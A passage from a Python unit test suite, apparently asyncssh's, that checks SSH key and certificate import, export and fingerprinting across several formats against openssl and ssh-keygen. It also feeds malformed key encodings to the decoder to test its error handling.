passphrase)\n cert.append_certificate('new_bundle', 'pem')\n\n keypair = asyncssh.load_keypairs('new_bundle', passphrase)[0]\n self.assertEqual(keypair.public_data, chain.public_data)\n\n with self.assertRaises(OSError):\n asyncssh.load_keypairs(('new', 'not_found'), passphrase)\n\n def check_public(self, format_name):\n \"\"\"Check for a public key match\"\"\"\n\n newkey = asyncssh.read_public_key('new')\n pubkey = newkey.export_public_key()\n pubdata = newkey.public_data\n\n self.assertEqual(newkey, self.pubkey)\n self.assertEqual(hash(newkey), hash(self.pubkey))\n\n pubkey = asyncssh.load_public_keys('new')[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys([newkey])[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys([pubkey])[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys(['new'])[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys(Path('new'))[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys([Path('new')])[0]\n self.assertEqual(pubkey, newkey)\n\n identity = load_identities(['new'])[0]\n self.assertEqual(identity, pubdata)\n\n newkey.write_public_key('list', format_name)\n newkey.append_public_key('list', format_name)\n\n keylist = asyncssh.read_public_key_list('list')\n self.assertEqual(keylist[0], newkey)\n self.assertEqual(keylist[1], newkey)\n\n newkey.write_public_key(Path('list'), format_name)\n newkey.append_public_key(Path('list'), format_name)\n\n write_file('list', b'Extra text at end of key list\\n', 'ab')\n\n keylist = asyncssh.load_public_keys(Path('list'))\n self.assertEqual(keylist[0], newkey)\n self.assertEqual(keylist[1], newkey)\n\n for hash_name in ('md5', 'sha1', 'sha256', 'sha384', 'sha512'):\n fp = newkey.get_fingerprint(hash_name)\n\n if self.use_openssh: # pragma: no branch\n keygen_fp = run('ssh-keygen -l -E %s -f sshpub' % hash_name)\n self.assertEqual(fp, keygen_fp.decode('ascii').split()[1])\n\n with self.assertRaises(ValueError):\n newkey.get_fingerprint('xxx')\n\n def check_certificate(self, cert_type, format_name):\n \"\"\"Check for a certificate match\"\"\"\n\n cert = asyncssh.read_certificate('cert')\n certdata = cert.export_certificate()\n\n self.assertEqual(cert.key, self.pubkey)\n\n if cert.is_x509:\n self.validate_x509(cert)\n else:\n self.validate_openssh(cert, cert_type, 'name')\n\n certlist = asyncssh.load_certificates(cert)\n self.assertEqual(certlist[0], cert)\n self.assertEqual(hash(certlist[0]), hash(cert))\n\n if cert.is_x509:\n self.assertEqual(certlist[0].x509_cert, cert.x509_cert)\n self.assertEqual(hash(certlist[0].x509_cert), hash(cert.x509_cert))\n\n certlist = asyncssh.load_certificates(certdata)\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates([cert])\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates([certdata])\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates('cert')\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates(Path('cert'))\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates([Path('cert')])\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates(certdata +\n b'Extra text in the middle\\n' +\n certdata)\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n\n cert.write_certificate('list', format_name)\n cert.append_certificate('list', format_name)\n\n certlist = asyncssh.load_certificates('list')\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n\n cert.write_certificate(Path('list'), format_name)\n cert.append_certificate(Path('list'), format_name)\n\n write_file('list', b'Extra text at end of certificate list\\n', 'ab')\n\n certlist = asyncssh.load_certificates(Path('list'))\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n\n certlist = asyncssh.load_certificates(['list', [cert]])\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n self.assertEqual(certlist[2], cert)\n\n certlist = asyncssh.load_certificates(['list', certdata])\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n self.assertEqual(certlist[2], cert)\n\n if format_name == 'openssh':\n certlist = asyncssh.load_certificates(certdata[:-1])\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates(certdata + certdata[:-1])\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n\n certlist = asyncssh.load_certificates(certdata[1:-1])\n self.assertEqual(len(certlist), 0)\n\n certlist = asyncssh.load_certificates(certdata[1:] + certdata[:-1])\n self.assertEqual(len(certlist), 1)\n self.assertEqual(certlist[0], cert)\n\n\n def import_pkcs1_private(self, fmt, cipher=None, args=None):\n \"\"\"Check import of a PKCS#1 private key\"\"\"\n\n format_name = 'pkcs1-%s' % fmt\n\n if self.use_openssl: # pragma: no branch\n if cipher:\n run('openssl %s %s -in priv -inform pem -out new -outform %s '\n '-passout pass:passphrase' % (self.keyclass, args, fmt))\n else:\n run('openssl %s -in priv -inform pem -out new -outform %s' %\n (self.keyclass, fmt))\n else: # pragma: no cover\n self.privkey.write_private_key('new', format_name,\n select_passphrase(cipher), cipher)\n\n self.check_private(format_name, select_passphrase(cipher))\n\n def export_pkcs1_private(self, fmt, cipher=None, legacy_args=None):\n \"\"\"Check export of a PKCS#1 private key\"\"\"\n\n format_name = 'pkcs1-%s' % fmt\n self.privkey.write_private_key('privout', format_name,\n select_passphrase(cipher), cipher)\n\n if self.use_openssl: # pragma: no branch\n if cipher:\n run('openssl %s %s -in privout -inform %s -out new '\n '-outform pem -passin pass:passphrase' %\n (self.keyclass, legacy_args, fmt))\n else:\n run('openssl %s -in privout -inform %s -out new -outform pem' %\n (self.keyclass, fmt))\n else: # pragma: no cover\n priv = asyncssh.read_private_key('privout',\n select_passphrase(cipher))\n priv.write_private_key('new', format_name)\n\n self.check_private(format_name)\n\n def import_pkcs1_public(self, fmt):\n \"\"\"Check import of a PKCS#1 public key\"\"\"\n\n format_name = 'pkcs1-%s' % fmt\n\n if (not self.use_openssl or self.keyclass == 'dsa' or\n _openssl_version < b'OpenSSL 1.0.0'): # pragma: no cover\n # OpenSSL no longer has support for PKCS#1 DSA, and PKCS#1\n # RSA is not supported before OpenSSL 1.0.0, so we only test\n # against ourselves in these cases.\n\n self.pubkey.write_public_key('new', format_name)\n else:\n run('openssl %s -pubin -in pub -inform pem -RSAPublicKey_out '\n '-out new -outform %s' % (self.keyclass, fmt))\n\n self.check_public(format_name)\n\n def export_pkcs1_public(self, fmt):\n \"\"\"Check export of a PKCS#1 public key\"\"\"\n\n format_name = 'pkcs1-%s' % fmt\n self.privkey.write_public_key('pubout', format_name)\n\n if not self.use_openssl or self.keyclass == 'dsa': # pragma: no cover\n # OpenSSL no longer has support for PKCS#1 DSA, so we can\n # only test against ourselves.\n\n pub = asyncssh.read_public_key('pubout')\n pub.write_public_key('new', 'pkcs1-%s' % fmt)\n else:\n run('openssl %s -RSAPublicKey_in -in pubout -inform %s -out new '\n '-outform pem' % (self.keyclass, fmt))\n\n self.check_public(format_name)\n\n def import_pkcs8_private(self, fmt, openssl_ok=True, cipher=None,\n hash_alg=None, pbe_version=None, args=None):\n \"\"\"Check import of a PKCS#8 private key\"\"\"\n\n format_name = 'pkcs8-%s' % fmt\n\n if self.use_openssl and openssl_ok: # pragma: no branch\n if cipher:\n run('openssl pkcs8 -topk8 %s -in priv -inform pem -out new '\n '-outform %s -passout pass:passphrase' % (args, fmt))\n else:\n run('openssl pkcs8 -topk8 -nocrypt -in priv -inform pem '\n '-out new -outform %s' % fmt)\n else: # pragma: no cover\n self.privkey.write_private_key('new', format_name,\n select_passphrase(cipher,\n pbe_version),\n cipher, hash_alg, pbe_version)\n\n self.check_private(format_name, select_passphrase(cipher, pbe_version))\n\n def export_pkcs8_private(self, fmt, openssl_ok=True, cipher=None,\n hash_alg=None, pbe_version=None,\n legacy_args=None):\n \"\"\"Check export of a PKCS#8 private key\"\"\"\n\n format_name = 'pkcs8-%s' % fmt\n self.privkey.write_private_key('privout', format_name,\n select_passphrase(cipher, pbe_version),\n cipher, hash_alg, pbe_version)\n\n if self.use_openssl and openssl_ok: # pragma: no branch\n if cipher:\n run('openssl pkcs8 %s -in privout -inform %s -out new '\n '-outform pem -passin pass:passphrase' %\n (legacy_args, fmt))\n else:\n run('openssl pkcs8 -nocrypt -in privout -inform %s -out new '\n '-outform pem' % fmt)\n else: # pragma: no cover\n priv = asyncssh.read_private_key('privout',\n select_passphrase(cipher,\n pbe_version))\n priv.write_private_key('new', format_name)\n\n self.check_private(format_name)\n\n def import_pkcs8_public(self, fmt):\n \"\"\"Check import of a PKCS#8 public key\"\"\"\n\n format_name = 'pkcs8-%s' % fmt\n\n if self.use_openssl:\n if _openssl_supports_pkey:\n run('openssl pkey -pubin -in pub -inform pem -out new '\n '-outform %s' % fmt)\n else: # pragma: no cover\n run('openssl %s -pubin -in pub -inform pem -out new '\n '-outform %s' % (self.keyclass, fmt))\n else: # pragma: no cover\n self.pubkey.write_public_key('new', format_name)\n\n self.check_public(format_name)\n\n def export_pkcs8_public(self, fmt):\n \"\"\"Check export of a PKCS#8 public key\"\"\"\n\n format_name = 'pkcs8-%s' % fmt\n self.privkey.write_public_key('pubout', format_name)\n\n if self.use_openssl:\n if _openssl_supports_pkey:\n run('openssl pkey -pubin -in pubout -inform %s -out new '\n '-outform pem' % fmt)\n else: # pragma: no cover\n run('openssl %s -pubin -in pubout -inform %s -out new '\n '-outform pem' % (self.keyclass, fmt))\n else: # pragma: no cover\n pub = asyncssh.read_public_key('pubout')\n pub.write_public_key('new', format_name)\n\n self.check_public(format_name)\n\n def import_openssh_private(self, openssh_ok=True, cipher=None):\n \"\"\"Check import of an OpenSSH private key\"\"\"\n\n if self.use_openssh and openssh_ok: # pragma: no branch\n shutil.copy('priv', 'new')\n\n if cipher:\n run('ssh-keygen -p -a 1 -N passphrase -Z %s -o -f new' %\n cipher)\n else:\n run('ssh-keygen -p -N \"\" -o -f new')\n else: # pragma: no cover\n self.privkey.write_private_key('new', 'openssh',\n select_passphrase(cipher), cipher,\n rounds=1, ignore_few_rounds=True)\n\n self.check_private('openssh', select_passphrase(cipher))\n\n def export_openssh_private(self, openssh_ok=True, cipher=None):\n \"\"\"Check export of an OpenSSH private key\"\"\"\n\n self.privkey.write_private_key('new', 'openssh',\n select_passphrase(cipher), cipher,\n rounds=1, ignore_few_rounds=True)\n\n if self.use_openssh and openssh_ok: # pragma: no branch\n os.chmod('new', 0o600)\n\n if cipher:\n run('ssh-keygen -p -P passphrase -N \"\" -o -f new')\n else:\n run('ssh-keygen -p -N \"\" -o -f new')\n else: # pragma: no cover\n priv = asyncssh.read_private_key('new', select_passphrase(cipher))\n priv.write_private_key('new', 'openssh')\n\n self.check_private('openssh')\n\n def import_openssh_public(self):\n \"\"\"Check import of an OpenSSH public key\"\"\"\n\n shutil.copy('sshpub', 'new')\n\n self.check_public('openssh')\n\n def export_openssh_public(self):\n \"\"\"Check export of an OpenSSH public key\"\"\"\n\n self.privkey.write_public_key('pubout', 'openssh')\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -e -f pubout -m rfc4716 > new')\n else: # pragma: no cover\n pub = asyncssh.read_public_key('pubout')\n pub.write_public_key('new', 'rfc4716')\n\n self.check_public('openssh')\n\n def import_openssh_certificate(self, cert_type, cert):\n \"\"\"Check import of an OpenSSH certificate\"\"\"\n\n shutil.copy(cert, 'cert')\n\n self.check_certificate(cert_type, 'openssh')\n\n def export_openssh_certificate(self, cert_type, cert):\n \"\"\"Check export of an OpenSSH certificate\"\"\"\n\n cert.write_certificate('certout', 'openssh')\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -e -f certout -m rfc4716 > cert')\n else: # pragma: no cover\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'rfc4716')\n\n self.check_certificate(cert_type, 'openssh')\n\n def import_rfc4716_public(self):\n \"\"\"Check import of an RFC4716 public key\"\"\"\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -e -f sshpub -m rfc4716 > new')\n else: # pragma: no cover\n self.pubkey.write_public_key('new', 'rfc4716')\n\n self.check_public('rfc4716')\n\n pubdata = self.pubkey.export_public_key('rfc4716')\n write_file('new', pubdata.replace(b'\\n', b'\\nXXX:\\n', 1))\n\n self.check_public('rfc4716')\n\n def export_rfc4716_public(self):\n \"\"\"Check export of an RFC4716 public key\"\"\"\n\n self.pubkey.write_public_key('pubout', 'rfc4716')\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -i -f pubout -m rfc4716 > new')\n else: # pragma: no cover\n pub = asyncssh.read_public_key('pubout')\n pub.write_public_key('new', 'openssh')\n\n self.check_public('rfc4716')\n\n def import_rfc4716_certificate(self, cert_type, cert):\n \"\"\"Check import of an RFC4716 certificate\"\"\"\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -e -f %s -m rfc4716 > cert' % cert)\n else: # pragma: no cover\n if cert_type == CERT_TYPE_USER:\n cert = self.usercert\n else:\n cert = self.hostcert\n\n cert.write_certificate('cert', 'rfc4716')\n\n self.check_certificate(cert_type, 'rfc4716')\n\n def export_rfc4716_certificate(self, cert_type, cert):\n \"\"\"Check export of an RFC4716 certificate\"\"\"\n\n cert.write_certificate('certout', 'rfc4716')\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -i -f certout -m rfc4716 > cert')\n else: # pragma: no cover\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'openssh')\n\n self.check_certificate(cert_type, 'rfc4716')\n\n\n def import_der_x509_certificate(self, cert_type, cert):\n \"\"\"Check import of a DER X.509 certificate\"\"\"\n\n cert.write_certificate('cert', 'der')\n self.check_certificate(cert_type, 'der')\n\n def export_der_x509_certificate(self, cert_type, cert):\n \"\"\"Check export of a DER X.509 certificate\"\"\"\n\n cert.write_certificate('certout', 'der')\n\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'openssh')\n\n self.check_certificate(cert_type, 'der')\n\n def import_pem_x509_certificate(self, cert_type, cert, trusted=False):\n \"\"\"Check import of a PEM X.509 certificate\"\"\"\n\n cert.write_certificate('cert', 'pem')\n\n if trusted:\n with open('cert') as f:\n lines = f.readlines()\n\n lines[0] = lines[0][:11] + 'TRUSTED ' + lines[0][11:]\n\n idx = lines[-2].find('=')\n lines[-2] = lines[-2][:idx] + 'XXXX' + lines[-2][idx:]\n\n lines[-1] = lines[-1][:9] + 'TRUSTED ' + lines[-1][9:]\n\n with open('cert', 'w') as f:\n f.writelines(lines)\n\n self.check_certificate(cert_type, 'pem')\n\n def export_pem_x509_certificate(self, cert_type, cert):\n \"\"\"Check export of a PEM X.509 certificate\"\"\"\n\n cert.write_certificate('certout', 'pem')\n\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'openssh')\n\n self.check_certificate(cert_type, 'pem')\n\n def import_openssh_x509_certificate(self, cert_type, cert):\n \"\"\"Check import of an OpenSSH X.509 certificate\"\"\"\n\n cert.write_certificate('cert')\n self.check_certificate(cert_type, 'openssh')\n\n def export_openssh_x509_certificate(self, cert_type, cert):\n \"\"\"Check export of an OpenSSH X.509 certificate\"\"\"\n\n cert.write_certificate('certout')\n\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'pem')\n\n self.check_certificate(cert_type, 'openssh')\n\n def check_encode_errors(self):\n \"\"\"Check error code paths in key encoding\"\"\"\n\n for fmt in ('pkcs1-der', 'pkcs1-pem', 'pkcs8-der', 'pkcs8-pem',\n 'openssh', 'rfc4716', 'xxx'):\n with self.subTest('Encode private from public (%s)' % fmt):\n with self.assertRaises(asyncssh.KeyExportError):\n self.pubkey.export_private_key(fmt)\n\n with self.subTest('Encode with unknown key format'):\n with self.assertRaises(asyncssh.KeyExportError):\n self.privkey.export_public_key('xxx')\n\n with self.subTest('Encode encrypted pkcs1-der'):\n with self.assertRaises(asyncssh.KeyExportError):\n self.privkey.export_private_key('pkcs1-der', 'x')\n\n if self.keyclass == 'ec':\n with self.subTest('Encode EC public key with PKCS#1'):\n with self.assertRaises(asyncssh.KeyExportError):\n self.privkey.export_public_key('pkcs1-pem')\n\n if 'pkcs1' in self.private_formats:\n with self.subTest('Encode with unknown PKCS#1 cipher'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('pkcs1-pem', 'x', 'xxx')\n\n if 'pkcs8' in self.private_formats: # pragma: no branch\n with self.subTest('Encode with unknown PKCS#8 cipher'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('pkcs8-pem', 'x', 'xxx')\n\n with self.subTest('Encode with unknown PKCS#8 hash'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('pkcs8-pem', 'x',\n 'aes128-cbc', 'xxx')\n\n with self.subTest('Encode with unknown PKCS#8 version'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('pkcs8-pem', 'x',\n 'aes128-cbc', 'sha1', 3)\n\n if bcrypt_available: # pragma: no branch\n with self.subTest('Encode with unknown openssh cipher'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('openssh', 'x', 'xxx')\n\n with self.subTest('Encode agent cert private from public'):\n with self.assertRaises(asyncssh.KeyExportError):\n self.pubkey.encode_agent_cert_private()\n\n def check_decode_errors(self):\n \"\"\"Check error code paths in key decoding\"\"\"\n\n private_errors = [\n ('Non-ASCII', '\\xff'),\n ('Incomplete ASN.1', b''),\n ('Invalid PKCS#1', der_encode(None)),\n ('Invalid PKCS#1 params',\n der_encode((1, b'', TaggedDERObject(0, b'')))),\n ('Invalid PKCS#1 EC named curve OID',\n der_encode((1, b'',\n TaggedDERObject(0, ObjectIdentifier('1.1'))))),\n ('Invalid PKCS#8',\n der_encode((0, (self.privkey.pkcs8_oid, ()), der_encode(None)))),\n ('Unknown PKCS#8 algorithm',\n der_encode((0, (ObjectIdentifier('1.1'), None), b''))),\n ('Invalid PKCS#8 ASN.1',\n der_encode((0, (self.privkey.pkcs8_oid, None), b''))),\n ('Invalid PKCS#8 params',\n der_encode((1, (self.privkey.pkcs8_oid, b''),\n der_encode((1, b''))))),\n ('Invalid PEM header', b'-----BEGIN XXX-----\\n'),\n ('Missing PEM footer', b'-----BEGIN PRIVATE KEY-----\\n'),\n ('Invalid PEM key type',\n b'-----BEGIN XXX PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END XXX PRIVATE KEY-----'),\n ('Invalid PEM Base64',\n b'-----BEGIN PRIVATE KEY-----\\n'\n b'X\\n'\n b'-----END PRIVATE KEY-----'),\n ('Missing PKCS#1 passphrase',\n b'-----BEGIN DSA PRIVATE KEY-----\\n'\n b'Proc-Type: 4,ENCRYPTED\\n'\n b'-----END DSA PRIVATE KEY-----'),\n ('Incomplete PEM ASN.1',\n b'-----BEGIN PRIVATE KEY-----\\n'\n b'-----END PRIVATE KEY-----'),\n ('Missing PEM PKCS#8 passphrase',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#1 key',\n b'-----BEGIN DSA PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END DSA PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 key',\n b'-----BEGIN PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END PRIVATE KEY-----'),\n ('Unknown format OpenSSH key',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b'XXX') +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Incomplete OpenSSH key',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b'openssh-key-v1\\0') +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH nkeys',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String(''), String(''), String(''),\n UInt32(2), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Missing OpenSSH passphrase',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('xxx'), String(''), String(''),\n UInt32(1), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Mismatched OpenSSH check bytes',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('none'), String(''), String(''),\n UInt32(1), String(''), String(b''.join((UInt32(1),\n UInt32(2))))))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH algorithm',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('none'), String(''), String(''),\n UInt32(1), String(''), String(b''.join((UInt32(1), UInt32(1),\n String('xxx'))))))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH pad',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('none'), String(''), String(''),\n UInt32(1), String(''), String(b''.join((UInt32(1), UInt32(1),\n String('ssh-dss'),\n 5*MPInt(0),\n String(''),\n b'\\0')))))) +\n b'-----END OPENSSH PRIVATE KEY-----')\n ]\n\n decrypt_errors = [\n ('Invalid PKCS#1', der_encode(None)),\n ('Invalid PKCS#8', der_encode((0, (self.privkey.pkcs8_oid, ()),\n der_encode(None)))),\n ('Invalid PEM params', b'-----BEGIN DSA PRIVATE KEY-----\\n'\n b'Proc-Type: 4,ENCRYPTED\\n'\n b'DEK-Info: XXX\\n'\n b'-----END DSA PRIVATE KEY-----'),\n ('Invalid PEM cipher', b'-----BEGIN DSA PRIVATE KEY-----\\n'\n b'Proc-Type: 4,ENCRYPTED\\n'\n b'DEK-Info: XXX,00\\n'\n b'-----END DSA PRIVATE KEY-----'),\n ('Invalid PEM IV', b'-----BEGIN DSA PRIVATE KEY-----\\n'\n b'Proc-Type: 4,ENCRYPTED\\n'\n b'DEK-Info: AES-256-CBC,XXX\\n'\n b'-----END DSA PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 encrypted data',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 encrypted header',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode((None, None))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 encryption algorithm',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((None, None), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES1 encryption parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_ES1_SHA1_DES, None), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES1 PKCS#12 encryption parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_P12_RC4_40, None), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES1 PKCS#12 salt',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_P12_RC4_40, (b'', 0)), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES1 PKCS#12 iteration count',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_P12_RC4_40, (b'x', 0)), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 encryption parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_ES2, None), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 KDF algorithm',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((None, None), (None, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 encryption algorithm',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, None), (None, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 PBKDF2 parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, None), (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 PBKDF2 salt',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (None, None)),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 PBKDF2 iteration count',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', None)),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 PBKDF2 PRF',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', 1, None)),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Unknown PEM PKCS#8 PBES2 PBKDF2 PRF',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', 1,\n (ObjectIdentifier('1.1'), None))),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 encryption parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', 1)),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid length PEM PKCS#8 PBES2 IV',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', 1)),\n (_ES2_AES128, b''))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid OpenSSH cipher',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('xxx'), String(''), String(''),\n UInt32(1), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH kdf',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('xxx'),\n String(''), UInt32(1), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH kdf data',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('bcrypt'),\n String(''), UInt32(1), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH salt',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('bcrypt'),\n String(b''.join((String(b''), UInt32(128)))), UInt32(1),\n String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH encrypted data',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('bcrypt'),\n String(b''.join((String(16*b'\\0'), UInt32(128)))), UInt32(1),\n String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Unexpected OpenSSH trailing data',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('bcrypt'),\n String(b''.join((String(16*b'\\0'), UInt32(128)))), UInt32(1),\n String(''), String(''), String('xxx')))) +\n b'-----END OPENSSH PRIVATE KEY-----')\n ]\n\n public_errors = [\n ('Non-ASCII', '\\xff'),\n ('Invalid ASN.1', b'\\x30'),\n ('Invalid PKCS#1', der_encode(None)),\n ('Invalid PKCS#8', der_encode(((self.pubkey.pkcs8_oid, ()),\n BitString(der_encode(None))))),\n ('Unknown PKCS#8 algorithm', der_encode(((ObjectIdentifier('1.1'),\n None), BitString(b'')))),\n ('Invalid 